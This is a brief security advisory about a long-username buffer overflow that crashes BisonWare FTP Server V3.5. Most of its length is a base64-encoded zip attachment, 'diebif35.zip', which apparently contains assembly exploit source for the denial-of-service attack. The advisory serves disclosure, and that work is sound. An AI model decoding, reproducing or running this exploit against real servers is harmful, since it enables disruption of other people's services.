COMMAND

    BisonWare FTP Server

SYSTEMS AFFECTED

    BisonWare FTP Server V3.5

PROBLEM

    UssrLabs found a Local/Remote  DoS Attack in BisonWare  FTP Server
    V3.5, the buffer overflow  is caused by a  long user name of  2000
    characters.   There is  not much  to expand  on.... just  a simple
    hole.  For example go to:

        http://www.ussrback.com/biftps35/

    Below is source (mimed):

    ---
    Content-Type: application/octet-stream; name="diebif35.zip"
    Content-Transfer-Encoding: base64
    Content-Disposition: inline; filename="diebif35.zip"
    Content-MD5: paijGG8iCrB5mPxCu3Aybg==
    
    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
    BwAAAAA=
    
    -----

SOLUTION

    Nothing yet.  Vendor has been contacted.